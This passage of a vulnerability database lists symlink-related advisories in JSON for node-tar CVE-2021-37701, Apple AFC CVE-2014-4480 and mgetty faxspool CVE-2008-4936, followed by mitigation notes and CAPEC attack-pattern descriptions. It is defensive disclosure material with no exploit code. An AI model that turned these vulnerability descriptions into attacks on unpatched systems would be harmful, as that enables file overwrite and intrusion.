attempt to sanitize tar input themselves.\n\n### Fix\n\nThe problem is addressed in the following ways:\n\n1. All paths are normalized to use `/` as a path separator, replacing `\\` with `/` on Windows systems, and leaving `\\` intact in the path on posix systems. This is performed in depth, at every level of the program where paths are consumed.\n2. Directory cache pruning is performed case-insensitively. This _may_ result in undue cache misses on case-sensitive file systems, but the performance impact is negligible.\n\n#### Caveat\n\nNote that this means that the `entry` objects exposed in various parts of tar\u0027s API will now always use `/` as a path separator, even on Windows systems. This is not expected to cause problems, as `/` is a valid path separator on Windows systems, but _may_ result in issues if `entry.path` is compared against a path string coming from some other API such as `fs.realpath()` or `path.resolve()`.\n\nUsers are encouraged to always normalize paths using a well-tested method such as `path.resolve()` before comparing paths to one another.",
"id": "GHSA-9r2w-394v-53qc",
"modified": "2021-08-31T16:01:50Z",
"published": "2021-08-31T16:05:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37701"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
},
{
"type": "PACKAGE",
"url": "https://github.com/npm/node-tar"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00023.html"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-5008"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/tar"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links"
}
GHSA-9R34-X38V-77C4
Vulnerability from github – Published: 2022-05-14 01:26 – Updated: 2022-05-14 01:26Directory traversal vulnerability in afc in AppleFileConduit in Apple iOS before 8.1.3 and Apple TV before 7.0.3 allows attackers to access unintended filesystem locations by creating a symlink.
{
"affected": [],
"aliases": [
"CVE-2014-4480"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2015-01-30T11:59:00Z",
"severity": "HIGH"
},
"details": "Directory traversal vulnerability in afc in AppleFileConduit in Apple iOS before 8.1.3 and Apple TV before 7.0.3 allows attackers to access unintended filesystem locations by creating a symlink.",
"id": "GHSA-9r34-x38v-77c4",
"modified": "2022-05-14T01:26:15Z",
"published": "2022-05-14T01:26:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4480"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2015/Jan/msg00000.html"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2015/Jan/msg00001.html"
},
{
"type": "WEB",
"url": "http://support.apple.com/HT204245"
},
{
"type": "WEB",
"url": "http://support.apple.com/HT204246"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/72334"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1031652"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-9R8X-J9WV-WVQV
Vulnerability from github – Published: 2022-05-17 02:18 – Updated: 2022-05-17 02:18faxspool in mgetty 1.1.36 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/faxsp.##### temporary file.
{
"affected": [],
"aliases": [
"CVE-2008-4936"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-11-05T15:00:00Z",
"severity": "MODERATE"
},
"details": "faxspool in mgetty 1.1.36 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/faxsp.##### temporary file.",
"id": "GHSA-9r8x-j9wv-wvqv",
"modified": "2022-05-17T02:18:33Z",
"published": "2022-05-17T02:18:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-4936"
},
{
"type": "WEB",
"url": "https://bugs.gentoo.org/show_bug.cgi?id=235770"
},
{
"type": "WEB",
"url": "https://bugs.gentoo.org/show_bug.cgi?id=235806"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44833"
},
{
"type": "WEB",
"url": "http://bugs.debian.org/496403"
},
{
"type": "WEB",
"url": "http://dev.gentoo.org/~rbu/security/debiantemp/mgetty-fax"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/33051"
},
{
"type": "WEB",
"url": "http://security.gentoo.org/glsa/glsa-200812-08.xml"
},
{
"type": "WEB",
"url": "http://uvw.ru/report.lenny.txt"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2008/10/30/2"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/30927"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation MIT-48.1
Strategy: Separation of Privilege
- Follow the principle of least privilege when assigning access rights to entities in a software system.
- Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-132: Symlink Attack
An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.
CAPEC-17: Using Malicious Files
An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.